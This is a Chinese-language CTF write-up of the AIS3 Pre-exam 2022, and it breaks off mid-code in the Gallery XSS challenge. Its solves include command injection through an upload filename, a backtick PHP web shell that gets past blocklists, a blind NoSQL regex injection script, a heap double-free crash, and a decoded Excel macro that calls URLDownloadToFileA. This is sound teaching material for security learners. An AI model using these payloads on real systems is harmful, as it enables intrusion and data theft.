--- author: 王博靚 (Hyp) instagram: https://instagram.com/Ching367436 tags: ctf --- # AIS3 Pre-exam 2022 Write Up 原文網址: https://hackmd.io/@Ching367436/AIS3_Pre-exam_2022_Write-Up ## Welcome [100 pts] ``` AIS3{WTF did I just see the FLAG before CTF starts?} ``` ![](https://i.imgur.com/PIm639G.png) ## TariTari [456 pts] ### directory traversal `/download.php` 的 `?file` 可以 directory traversal ### 取得`../index.php` ![](https://i.imgur.com/9UPbIwY.jpg) ```php= <h1>Tari</h1> <p>Tari is a service that converts your file into a .tar.gz archive.</p> <form action="/" method="POST" enctype="multipart/form-data"> <input type="file" name="file" /> <input type="submit" value="Upload" /> </form> <?php function get_MyFirstCTF_flag() { // **MyFirstCTF ONLY FLAG** // Please IGNORE this flag if you are AIS3 Pre-Exam Player // Congratulations, you found the flag! // RCE me to get the second flag, it placed in the / directory :D echo 'MyFirstCTF FLAG: AIS3{../../3asy_pea5y_p4th_tr4ver5a1}'; } function tar($file) { $filename = $file['name']; $path = bin2hex(random_bytes(16)) . ".tar.gz"; $source = substr($file['tmp_name'], 1); $destination = "./files/$path"; passthru("tar czf '$destination' --transform='s|$source|$filename|' --directory='/tmp' '/$source'", $return); if ($return === 0) { return [$path, $filename]; } return [FALSE, FALSE]; } if ($_SERVER['REQUEST_METHOD'] == 'POST') { $file = $_FILES['file']; if ($file === NULL) { echo "<p>No file was uploaded.</p>"; } elseif ($file['error'] !== 0) { echo "<p>Error: Upload error.</p>"; } else { [$path, $filename] = tar($file); if ($path === FALSE) { echo "<p>Error: Failed to create archive.</p>"; } else { $path = base64_encode($path); $filename = urlencode($filename); echo "<a href=\"/download.php?file=$path&name=$filename.tar.gz\">Download</a>"; } } } ``` ### 取得 `../downloads.php` ```php <?php if ($_SERVER['REQUEST_METHOD'] == 'GET' && isset($_GET['file'])) { $file = base64_decode($_GET['file']); $path = "./files/$file"; $name = $_GET['name'] ?? basename($file); if (!file_exists($path)) { echo "File not found"; } else { header("Content-Type: application/zip"); header("Content-Disposition: attachment; filename=$name"); readfile($path); unlink($path); } } ``` ### Command Injection `index.php:24` 可以 Command Injection `filename` 為使用者可控制 `ls` ![](https://i.imgur.com/Toj2r4Z.jpg) `ls ..` ![](https://i.imgur.com/OLqnMIZ.jpg) `/` 好像不能用,所以多用一層 `base64` `ls /` -> `ls $(echo Lwo= | base64 -d)` ![](https://i.imgur.com/RqxBEgJ.jpg) `cat /y000000_i_am_the_f14GGG.txt` -> `cat $(echo L3kwMDAwMDBfaV9hbV90aGVfZjE0R0dHLnR4dAo= | base64 -d)` ![](https://i.imgur.com/Kta0eGg.jpg) ## Poking Bear [100 pts] ### 取得 Secret Bear 位置 ![](https://i.imgur.com/1163mF2.png) ### 將 cookie 修改為對應值 ![](https://i.imgur.com/FU7voyw.jpg) ### 取得 flag ![](https://i.imgur.com/bdIBbgw.jpg) ## SC [100 pts] ### 題目 ```python import string import random def shuffle(x): x = list(x) random.shuffle(x) return x def encrypt(T, file): with open(file) as f: pt = f.read() with open(f"{file}.enc", "w") as f: f.write(pt.translate(T)) charset = string.ascii_lowercase + string.ascii_uppercase + string.digits shuffled = "".join(shuffle(charset)) T = str.maketrans(charset, shuffled) encrypt(T, "flag.txt") encrypt(T, __file__) """ Substitution cipher From Wikipedia, the free encyclopedia Jump to navigationJump to search This article needs additional citations for verification. Please help improve this article by adding citations to reliable sources. Unsourced material may be challenged and removed. Find sources: "Substitution cipher" – news · newspapers · books · scholar · JSTOR (March 2009) (Learn how and when to remove this template message) In cryptography, a substitution cipher is a method of encrypting in which units of plaintext are replaced with the ciphertext, in a defined manner, with the help of a key; the "units" may be single letters (the most common), pairs of letters, triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing the inverse substitution process to extract the original message. Substitution ciphers can be compared with transposition ciphers. In a transposition cipher, the units of the plaintext are rearranged in a different and usually quite complex order, but the units themselves are left unchanged. By contrast, in a substitution cipher, the units of the plaintext are retained in the same sequence in the ciphertext, but the units themselves are altered. There are a number of different types of substitution cipher. If the cipher operates on single letters, it is termed a simple substitution cipher; a cipher that operates on larger groups of letters is termed polygraphic. A monoalphabetic cipher uses fixed substitution over the entire message, whereas a polyalphabetic cipher uses a number of substitutions at different positions in the message, where a unit from the plaintext is mapped to one of several possibilities in the ciphertext and vice versa. Contents 1 Simple substitution 1.1 Security for simple substitution ciphers 2 Nomenclator 3 Homophonic substitution 4 Polyalphabetic substitution 5 Polygraphic substitution 6 Mechanical substitution ciphers 7 The one-time pad 8 Substitution in modern cryptography 9 Substitution ciphers in popular culture 10 See also 11 References 12 External links """ ``` ### Solve ```python with open('cipher.py') as f1, open('cipher.py.enc') as f1_enc, open('flag.txt', 'w') as f2, open('flag.txt.enc') as f2_enc: pt1 = f1.read() ct1 = f1_enc.read() T = str.maketrans(ct1, pt1) ct2 = f2_enc.read() f2.write(ct2.translate(T)) ``` ## Time Management [100 pts] ### 題目放了假的 flag ```shell strings chal ``` ``` AIS3{hooray_strings_is_always_an_useful_command} ``` ### 用 gdb 解 題目會 `sleep(0x8763)`,所以把星報的地方改掉即可 :::spoiler ```shell (gdb) set disassembly-flavor intel (gdb) disassemble main Dump of assembler code for function main: 0x00005555555551a9 <+0>: endbr64 0x00005555555551ad <+4>: push rbp 0x00005555555551ae <+5>: mov rbp,rsp 0x00005555555551b1 <+8>: sub rsp,0x10 0x00005555555551b5 <+12>: mov DWORD PTR [rbp-0xc],0x0 0x00005555555551bc <+19>: lea rdi,[rip+0xeed] # 0x5555555560b0 0x00005555555551c3 <+26>: call 0x555555555080 <puts@plt> 0x00005555555551c8 <+31>: mov DWORD PTR [rbp-0x8],0x0 0x00005555555551cf <+38>: jmp 0x555555555271 <main+200> 0x00005555555551d4 <+43>: mov eax,DWORD PTR [rbp-0x8] 0x00005555555551d7 <+46>: cdqe 0x00005555555551d9 <+48>: lea rdx,[rax*4+0x0] 0x00005555555551e1 <+56>: lea rax,[rip+0xe38] # 0x555555556020 <secret> 0x00005555555551e8 <+63>: add rax,rdx 0x00005555555551eb <+66>: mov edx,DWORD PTR [rax] 0x00005555555551ed <+68>: mov eax,DWORD PTR [rbp-0x8] 0x00005555555551f0 <+71>: add eax,0x1 0x00005555555551f3 <+74>: cdqe 0x00005555555551f5 <+76>: lea rcx,[rax*4+0x0] 0x00005555555551fd <+84>: lea rax,[rip+0xe1c] # 0x555555556020 <secret> 0x0000555555555204 <+91>: add rax,rcx 0x0000555555555207 <+94>: mov eax,DWORD PTR [rax] 0x0000555555555209 <+96>: mov eax,eax 0x000055555555520b <+98>: lea rcx,[rax*4+0x0] 0x0000555555555213 <+106>: lea rax,[rip+0xe66] # 0x555555556080 <key> 0x000055555555521a <+113>: mov eax,DWORD PTR [rcx+rax*1] 0x000055555555521d <+116>: xor eax,edx 0x000055555555521f <+118>: mov DWORD PTR [rbp-0xc],eax 0x0000555555555222 <+121>: mov DWORD PTR [rbp-0x4],0x0 0x0000555555555229 <+128>: jmp 0x555555555267 <main+190> 0x000055555555522b <+130>: mov edi,0x8763 0x0000555555555230 <+135>: call 0x5555555550b0 <sleep@plt> 0x0000555555555235 <+140>: mov eax,DWORD PTR [rbp-0xc] 0x0000555555555238 <+143>: mov esi,eax 0x000055555555523a <+145>: lea rdi,[rip+0xe9d] # 0x5555555560de 0x0000555555555241 <+152>: mov eax,0x0 0x0000555555555246 <+157>: call 0x555555555090 <printf@plt> 0x000055555555524b <+162>: mov eax,DWORD PTR [rbp-0xc] 0x000055555555524e <+165>: shr eax,0x8 0x0000555555555251 <+168>: mov DWORD PTR [rbp-0xc],eax 0x0000555555555254 <+171>: mov rax,QWORD PTR [rip+0x2db5] # 0x555555558010 <stdout@@GLIBC_2.2.5> 0x000055555555525b <+178>: mov rdi,rax 0x000055555555525e <+181>: call 0x5555555550a0 <fflush@plt> 0x0000555555555263 <+186>: add DWORD PTR [rbp-0x4],0x1 0x0000555555555267 <+190>: cmp DWORD PTR [rbp-0x4],0x3 0x000055555555526b <+194>: jle 0x55555555522b <main+130> 0x000055555555526d <+196>: add DWORD PTR [rbp-0x8],0x2 0x0000555555555271 <+200>: cmp DWORD PTR [rbp-0x8],0x17 0x0000555555555275 <+204>: jle 0x5555555551d4 <main+43> 0x000055555555527b <+210>: lea rdi,[rip+0xe66] # 0x5555555560e8 0x0000555555555282 <+217>: call 0x555555555080 <puts@plt> 0x0000555555555287 <+222>: mov eax,0x0 0x000055555555528c <+227>: leave 0x000055555555528d <+228>: ret End of assembler dump. (gdb) break *main+135 Breakpoint 1 at 0x555555555230 (gdb) run Starting program: /home/c/Downloads/chal [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Hope you have enough time to receive my flag: Breakpoint 1, 0x0000555555555230 in main () (gdb) info registers rax 0x33534941 861096257 rbx 0x0 0 rcx 0x4 4 rdx 0x33534941 861096257 rsi 0x1 1 rdi 0x8763 34659 rbp 0x7fffffffdf70 0x7fffffffdf70 rsp 0x7fffffffdf60 0x7fffffffdf60 r8 0x0 0 r9 0x5555555592a0 93824992252576 r10 0x77 119 r11 0x246 582 r12 0x7fffffffe088 140737488347272 r13 0x5555555551a9 93824992235945 r14 0x0 0 r15 0x7ffff7ffd040 140737354125376 rip 0x555555555230 0x555555555230 <main+135> eflags 0x293 [ CF AF SF IF ] cs 0x33 51 ss 0x2b 43 ds 0x0 0 es 0x0 0 fs 0x0 0 gs 0x0 0 (gdb) set $rdi=1 # 略... Breakpoint 1, 0x0000555555555230 in main () (gdb) set $rdi=0 (gdb) c Continuing. S Breakpoint 1, 0x0000555555555230 in main () (gdb) set $rdi=1 (gdb) c Continuing. 3 Breakpoint 1, 0x0000555555555230 in main () (gdb) set $rdi=1 (gdb) c Continuing. { Breakpoint 1, 0x0000555555555230 in main () (gdb) set $rdi=1 (gdb) c Continuing. Y # 略... Breakpoint 1, 0x0000555555555230 in main () (gdb) set $rdi=1 (gdb) c Continuing. ! Breakpoint 1, 0x0000555555555230 in main () (gdb) set $rdi=1 (gdb) c Continuing. Oops! Where is the flag? I am sure that the flag is already printed! [Inferior 1 (process 2555) exited normally] (gdb) ``` ::: ``` AIS3{You_are_the_master_of_time_management!!!!!} ``` ## Simple File Uploader [100 pts] ### 題目 :::spoiler ```php= <?php if(isset($_FILES['file'])) { $file_name = basename($_FILES['file']['name']); $file_tmp = $_FILES['file']['tmp_name']; $file_type = $_FILES['file']['type']; $file_ext = pathinfo($file_name, PATHINFO_EXTENSION); if(in_array($file_ext, ['php', 'php2', 'php3', 'php4', 'php5', 'php6', 'phtml', 'pht'])) { die('p...php ?? (((゚Д゚;)))'); } $box = md5(session_start().session_id()); $dir = './uploads/' . $box . '/'; if (!file_exists($dir)) { mkdir($dir); } $is_bad = false; $file_content = file_get_contents($file_tmp); $data = strtolower($file_content); if (strpos($data, 'system') !== false) { $is_bad = true; } else if (strpos($data, 'exec') !== false) { $is_bad = true; } else if (strpos($data, 'passthru') !== false) { $is_bad = true; } else if (strpos($data, 'show_source') !== false) { $is_bad = true; } else if (strpos($data, 'proc_open') !== false) { $is_bad = true; } else if (strpos($data, 'popen') !== false) { $is_bad = true; } else if (strpos($data, 'pcntl_exec') !== false) { $is_bad = true; } else if (strpos($data, 'eval') !== false) { $is_bad = true; } else if (strpos($data, 'assert') !== false) { $is_bad = true; } else if (strpos($data, 'die') !== false) { $is_bad = true; } else if (strpos($data, 'shell_exec') !== false) { $is_bad = true; } else if (strpos($data, 'create_function') !== false) { $is_bad = true; } else if (strpos($data, 'call_user_func') !== false) { $is_bad = true; } else if (strpos($data, 'preg_replace') !== false) { $is_bad = true; } else if (strpos($data, 'scandir') !== false) { $is_bad = true; } if($is_bad) { die('You are bad ヽ(#`Д´)ノ'); } $new_filename = md5(time()).'.'.$file_ext; move_uploaded_file($file_tmp, $dir.$new_filename); echo ' <!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css"> <title>Simple File Uploader</title> </head> <body> <div class="container is-vcentered is-centered" style="max-width: 60%; padding-top: 10%;"> <article class="message"> <div class="message-header"> <p>Upload Success!</p> <button class="delete" aria-label="delete"></button> </div> <div class="message-body"> Upload /uploads/'. $box . '/' . $new_filename .' </div> </article> </div> <body> </html> '; } else if (isset($_GET['src'])) { show_source("index.php"); } else { echo file_get_contents('home.html'); } ?> ``` ::: ### Bypass Extension Filter `:10` 會檔 `.php` 所以使用 `.pHp` ### Bypass Function Filter `:24,54` 有 Filter 用 `\x60` (backtick) Bypass https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html ```php <?php echo `whoami`; ?> ``` ``` www-data ``` ### `ls /` ```php <?php echo `ls /`; ?> ``` ``` bin boot das_ist_die_fL4g.txt dev etc home lib lib64 media mnt opt proc rUn_M3_t0_9et_fL4g root run sbin srv sys tmp usr var ``` ### `cat das_ist_die_fL4g.txt` ```php <?php echo `cat das_ist_die_fL4g.txt`; ?> ``` ``` You are bad ヽ(#`Д´)ノ ``` ### `/rUn_M3_t0_9et_fL4g` ```php <?php echo `/rUn_M3_t0_9et_fL4g`; ?> ``` ``` AIS3{H3yyyyyyyy_U_g0t_mi٩(ˊᗜˋ*)و} ``` ## knock [356 pts] 會有人敲門 ![](https://i.imgur.com/5Iq1CCM.jpg) 敲的 port 看起來 `AIS3{}` ``` 12065 12073 12083 12051 12123 12107 12110 12048 12099 12107 12075 12078 12079 12067 12075 12107 12110 12111 12099 12107 12125 ``` ``` AIS3{kn0ckKNOCKknock} ``` ## Excel [100 pts] 把 isFki.A58 formula 的第一個參數解開 (A68) ![](https://i.imgur.com/X5IwNZq.jpg) `isFki.A58` ```javascript =FORMULA($mqLen.D14&$Mment.BA10&$coCGA.S17&$coCGA.Q19&$KRnsl.L19&$Mment.F3&$coCGA.G26&$coCGA.O23&$coCGA.P3&$coCGA.K12&$KRnsl.J19&$KRnsl.C11&$coCGA.N3&$mqLen.E4&$coCGA.D11&$KRnsl.T5&$JVHco.K10&$mqLen.BA14&$Mment.W1&$KRnsl.U13&$KRnsl.V9&$mqLen.C12&$KRnsl.J4&$Mment.Y19&$mqLen.K19&$JVHco.F2&$mqLen.K10&$coCGA.Z15&$mqLen.N21&$Mment.N1&$Mment.S2&$coCGA.X2&$Mment.D16&$coCGA.U26&$coCGA.R1&$mqLen.V9&$mqLen.R11&$Mment.X1&$coCGA.D5&$KRnsl.Z19&$mqLen.BA4&$coCGA.Z9&$coCGA.G7&$mqLen.U10&$Mment.U11&$coCGA.G18&$JVHco.V1&$mqLen.O26&$Mment.G5&$KRnsl.H22&$Mment.P10&$JVHco.W17&$Mment.F8&$coCGA.L15&$coCGA.H3&$KRnsl.U17&$KRnsl.BA11&$coCGA.X12&$KRnsl.F14&$Mment.B10&$KRnsl.V12&$Mment.U12&$coCGA.P14&$coCGA.Y1&$JVHco.B10&$JVHco.F16&$KRnsl.Q26&$Mment.P25&$KRnsl.M3&$KRnsl.I26&$mqLen.L15&$mqLen.V25&$KRnsl.G2&$Mment.I18&$Mment.M4&$KRnsl.C7&$JVHco.N5&$KRnsl.M19&$Mment.J9&$Mment.I7&$coCGA.G13&$KRnsl.M12&$mqLen.X2&$mqLen.M1&$JVHco.P3&$KRnsl.S12&$Mment.U10&$JVHco.D16&$mqLen.P17&$KRnsl.I5&$coCGA.W24&$JVHco.E10&$Mment.B8&$coCGA.C14&$JVHco.Z15&$Mment.BA11&$coCGA.F19&$KRnsl.Z2&$JVHco.D13&$Mment.O2&$KRnsl.D19&$Mment.K19&$Mment.U20&$JVHco.Q9&$KRnsl.I17&$coCGA.X17&$JVHco.Q24&$KRnsl.Q4&$coCGA.N21&$coCGA.W11&$JVHco.E17&$mqLen.H19&$KRnsl.X6&$coCGA.N26&$coCGA.N18&$KRnsl.Q17&$JVHco.J25&$KRnsl.Z16&$mqLen.P13&$coCGA.Z21&$JVHco.C24&$Mment.X19&$Mment.O21, A137) ``` 得到 ```javascript =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ais3.org/?AIS3{XLM_iS_to0_o1d_but_co0o0o00olll!!}",".\~tmp.txt",0,0) ``` ## Fast Cipher [100 pts] ### 題目 ```python from secrets import randbelow M = 2**1024 def f(x): # this is a *fast* function return ( 4 * x**4 + 8 * x**8 + 7 * x**7 + 6 * x**6 + 3 * x**3 + 0x48763 ) % M def encrypt(pt, key): ct = [] for c in pt: ct.append(c ^ (key & 0xFF)) key = f(key) return bytes(ct) if __name__ == "__main__": key = randbelow(M) ct = encrypt(open("flag.txt", "rb").read().strip(), key) print(ct.hex()) ``` ### Known Plaintext Attack ```python M = 2**1024 def f(x): # this is a *fast* function return ( 4 * x**4 + 8 * x**8 + 7 * x**7 + 6 * x**6 + 3 * x**3 + 0x48763 ) % M output_file = open('output.txt') ct = bytearray.fromhex(output_file.read().strip()) # the flag stars with AIS3 pt_head = bytearray("AIS3{".encode()) key = pt_head[0] ^ ct[0] def decrypt(ct, key): pt = [] for c in ct: pt.append(c ^ (key & 0xFF)) key = f(key) return bytes(pt) def main (): pt = decrypt(ct, key) print(pt) if __name__ == '__main__': main() ``` ``` AIS3{not_every_bits_are_used_lol} ``` ## SAAS - Crash [40 pts] ### 題目 > This challenge is not about Software as a Service, but String as a Service. >> You only need to crash the program at remote to get this flag, no need to actually write exploit for it :::spoiler ```cpp #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> class String { public: char *str; size_t len; String(const char *s) { len = strlen(s); str = new char[len + 1]; strcpy(str, s); } ~String() { delete[] str; } }; const int MAX_STRS = 16; char tmp[4096]; String *strs[MAX_STRS] = {}; int readidx() { char c; int idx; printf("Index: "); scanf("%d%c", &idx, &c); if (idx < 0 || idx >= MAX_STRS) { printf("Bad index\n"); exit(0); } return idx; } void print(String s) { printf("Length: %zu\n", s.len); printf("Content: "); write(1, s.str, s.len); printf("\n"); } void menu() { printf("===== S(tring)AAS =====\n"); printf("1. Create string\n"); printf("2. Edit string\n"); printf("3. Print string\n"); printf("4. Delete string\n"); } int main() { setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); while (true) { int choice, idx; char c; menu(); printf("> "); scanf("%d", &choice); switch (choice) { case 1: idx = readidx(); printf("Content: "); scanf("%4095[^\n]", tmp); scanf("%c", &c); strs[idx] = new String(tmp); break; case 2: idx = readidx(); printf("New Content: "); if (strs[idx] != nullptr) { scanf("%4095[^\n]", tmp); scanf("%c", &c); memcpy(strs[idx]->str, tmp, strs[idx]->len); strs[idx]->str[strs[idx]->len] = 0; } else { printf("String #%d doesn't exist!\n", idx); } break; case 3: idx = readidx(); if (strs[idx] != nullptr) { print(*strs[idx]); } else { printf("String #%d doesn't exist!\n", idx); } break; case 4: idx = readidx(); if (strs[idx] != nullptr) { delete strs[idx]; strs[idx] = nullptr; } else { printf("String #%d doesn't exist!\n", idx); } break; default: puts("Bad option"); exit(0); } } return 0; } ``` ::: ### Solve 長度處理於 `2. Edit string` 是會有問題 :::spoiler ```shell ch@CHSMB chall % ./a.out ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 1 Index: 1 Content: t ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 2 Index: 1 New Content: ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 3 Index: 1 Length: 1 Content: t ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 4 Index: 1 a.out(15050,0x11479e600) malloc: *** error for object 0x6000031a0010: pointer being freed was not allocated a.out(15050,0x11479e600) malloc: *** set a breakpoint in malloc_error_break to debug zsh: abort ./a.out ``` ::: ``` ch@CHSMB chall % nc chals1.ais3.org 6008 ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 1 Index: 1 Content: t ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 2 Index: 1 New Content: ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 3 Index: 1 Length: 1 Content: t ===== S(tring)AAS ===== 1. Create string 2. Edit string 3. Print string 4. Delete string > 4 Index: 1 free(): double free detected in tcache 2 timeout: the monitored command dumped core Aborted AIS3{congrats_on_crashing_my_editor!_but_can_you_get_shell_from_it?} ch@CHSMB chall % ``` ## The Best Login UI [432 pts] ### 題目 ```javascript= const express = require('express'); const bodyParser = require('body-parser'); const app = express(); app.use(bodyParser.urlencoded({ extended: true })); const PORT = process.env.PORT || 3000; const mongo = { host: process.env.MONGO_HOST || 'localhost', db: process.env.MONGO_DB || 'loginui', }; app.get('/', (_, res) => { res.sendFile(__dirname + '/index.html'); }); app.post('/login', async (req, res) => { const db = app.get('db'); const { username, password } = req.body; const user = await db.collection('users').findOne({ username, password }); if (user) { res.send('Success owo!'); } else { res.send('Failed qwq'); } }); const MongoClient = require('mongodb').MongoClient; MongoClient.connect(mongo.host, (err, client) => { if (err) throw err; app.set('db', client.db(mongo.db)); app.listen(PORT, () => console.log(`Listening on port ${PORT}`)); }); ``` ### `src/app.js:5` https://www.npmjs.com/package/qs#parsing-objects > qs allows you to create nested objects within your query strings, by surrounding the name of sub-keys with square brackets []. For example, the string 'foo[bar]=baz' converts to: > > foo: { bar: 'baz' } ### 使用 mongodb 的 `$regex` `:20` 可以控制 `password` 來使用 mongodb 的 `$regex` ```url username=admin&password[$regex]=AIS3{.+ ``` ![](https://i.imgur.com/w7Fc0aB.jpg) ### 取得長度 `password[$regex]` ```url ^AIS3\{.{36}$ ``` ```html Success owo! ``` ### 確認 ASCII Printable `password[$regex]` ```url ^AIS3\{[ -~]{35}\}$ ``` ```html Success owo! ``` ### Binary Search ```python import requests URL = 'http://chals1.ais3.org:54088/login' data = { "username": "admin", "password[$regex]": '''^AIS3\{[ -~]{35}\}$''' } flag_pattern = '''^AIS3\{Bl1nd-b4s3d r3gex n0sq1i\?\! \(:3\[''' def check (data) -> bool: r = requests.post(URL, data=data) return "owo" in r.text def chr2 (a): if chr(a) == '\\': return '\\\\' if chr(a) == ')': return '\)' if chr(a) == '(': return '\(' if chr(a) == ']': return '\]' if chr(a) == '[': return '\[' if chr(a) == '?': return '\?' if chr(a) == '!': return '\!' if chr(a) == '-': return '\-' return chr(a) def find_one (): global flag_pattern global data l = ord(' ') r = ord('~') while l < r: m = (l+r) // 2 data["password[$regex]"] = f'{flag_pattern}[{chr2(l)}-{chr2(m)}]' print(data["password[$regex]"], end="\n") if check(data): r = m else: l = m+1 print(l) flag_pattern += chr2(l) def main(): global flag_pattern while flag_pattern[-1] != '}': find_one() print(flag_pattern) if __name__ == '__main__': main() ``` ``` ^AIS3\{Bl1nd-b4s3d r3gex n0sq1i\?\! \(:3\[___\]} ``` ```javascript AIS3{Bl1nd-b4s3d r3gex n0sq1i?! (:3[___]} ``` ## Gallery [500 pts] <!-- https://stackoverflow.com/questions/1797203/how-to-load-an-external-javascript-script-to-pure-svg-document --> <!-- https://stackoverflow.com/questions/35192841/how-do-i-post-with-multipart-form-data-using-fetch --> ### 題目 > 這是一題前端安全題;你會需要透過 Report 功能傳網址給 admin 瀏覽,藉此來偷到 admin 擁有的 FLAG :::spoiler ```javascript= from flask import Flask, render_template, request, redirect, url_for, g, session, send_file import sqlite3 import secrets import os import uuid import mimetypes import pathlib from rq import Queue from redis import Redis app = Flask(__name__) app.queue = Queue(connection=Redis('xss-bot')) app.config.update({ 'SECRET_KEY': secrets.token_bytes(16), 'UPLOAD_FOLDER': '/data/uploads', 'MAX_CONTENT_LENGTH': 32 * 1024 * 1024, # 32MB }) IMAGE_EXTENSIONS = [ext for ext, type in mimetypes.types_map.items() if type.startswith('image/')] ADMIN_PASSWORD = os.getenv('ADMIN_PASSWORD', 'admin') FLAG_UUID = os.getenv('FLAG_UUID', str(uuid.uuid4())) def db(): db = getattr(g, '_database', None) if db is None: db = g._database = sqlite3.connect('/tmp/db.sqlite3') db.row_factory = sqlite3.Row return db @app.before_first_request def create_tables(): cursor = db().cursor() cursor.executescript(""" CREATE TABLE IF NOT EXISTS users ( id INTEGER PRIMARY KEY AUTOINCREMENT, username TEXT, password TEXT ); CREATE TABLE IF NOT EXISTS images ( id INTEGER PRIMARY KEY AUTOINCREMENT, uuid TEXT, title TEXT, filename TEXT, user_id INTEGER, FOREIGN KEY(user_id) REFERENCES users(id) ); """) cursor.execute("SELECT * FROM users WHERE username='admin'") if cursor.fetchone() == None: cursor.execute("INSERT INTO users (username, password) VALUES (?, ?)", ('admin', ADMIN_PASSWORD)) admin_id = cursor.lastrowid cursor.execute("INSERT INTO images (user_id, uuid, filename, title) VALUES (?, ?, ?, ?)", (admin_id, FLAG_UUID, FLAG_UUID+".png", "FLAG")) db().commit() @app.teardown_appcontext def close_connection(exception): db = getattr(g, '_database', None) if db is not None: db.close() @app.after_request def add_csp(response): response.headers['Content-Security-Policy'] = ';'.join([ "default-src 'self'", "font-src 'self' https://fonts.googleapis.com https://fonts.gstatic.com" ]) return response @app.route('/') def index(): if 'user_id' not in session: return redirect(url_for('login')) cursor = db().cursor() cursor.execute("SELECT * FROM images WHERE user_id=?", (session['user_id'],)) images = cursor.fetchall() return render_template('index.html', images=images) @app.route('/login', methods=['GET', 'POST']) def login(): if request.method == 'GET': return render_template('login.html') else: username = request.form['username'] password = request.form['password'] if len(username) < 5 or len(password) < 5: return render_template('login.html', error="Username and password must be at least 5 characters long.") cursor = db().cursor() cursor.execute("SELECT * FROM users WHERE username=?", (username,)) user = cursor.fetchone() if user is None: user_id = cursor.execute("INSERT INTO users (username, password) VALUES (?, ?)", (username, password)).lastrowid session['user_id'] = user_id db().commit() return redirect(url_for('index')) elif user['password'] == password: session['user_id'] = user['id'] return redirect(url_for('index')) else: return render_template('login.html', error="Invalid username or password") @app.route('/image/<uuid>') def view(uuid): cursor = db().cursor() cursor.execute("SELECT * FROM images WHERE uuid=?", (uuid,)) image = cursor.fetchone() if image: if image['user_id'] != session['user_id'] and session['user_id'] != 1: return "You don't have permission to view this image.", 403 return send_file(os.path.join(app.config['UPLOAD_FOLDER'], image['filename'])) else: return "Image not found.", 404 @app.route('/image/<uuid>/download') def download(uuid): cursor = db().cursor() cursor.execute("SELECT * FROM images WHERE uuid=?", (uuid,)) image = cursor.fetchone() if image: if image['user_id'] != session['user_id']: return "You don't have permission to download this image.", 403 return send_file(os.path.join(app.config['UPLOAD_FOLDER'], image['filename']), as_attachment=True, mimetype='application/octet-stream') else: return "Image not found.", 404 @app.route('/upload', methods=['GET', 'POST']) def upload(): if 'user_id' not in session: return redirect(url_for('login')) if request.method == 'GET': return render_template('upload.html') else: title = request.form['title'] or '(No title)' file = request.files['file'] if file.filename == '': return render_template('upload.html', error="No file selected") extension = pathlib.Path(file.filename).suffix if extension not in IMAGE_EXTENSIONS: return render_template('upload.html', error="File must be an image") image_uuid = str(uuid.uuid4()) filename = image_uuid + extension cursor = db().cursor() cursor.execute("INSERT INTO images (user_id, uuid, title, filename) VALUES (?, ?, ?, ?)", (session['user_id'], image_uuid, title, filename)) db().commit() file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename)) return redirect(url_for('index')) @app.route('/report', methods=['GET', 'POST']) def report(): if 'user_id' not in session: return redirect(url_for('login')) if request.method == 'GET': return f''' <h1>Report to admin</h1> <p>注意:admin 會用 <code>http://web/</code> (而非 {request.url_root} 作為 base URL 來訪問你提交的網站。</p> <form action="/report" method="POST"> <input type="text" name="url" placeholder="URL ({request.url_root}...)"> <input type="submit" value="Submit"> </form> ''' else: url = request.form['url'] if url.startswith(request.url_root): url_path = 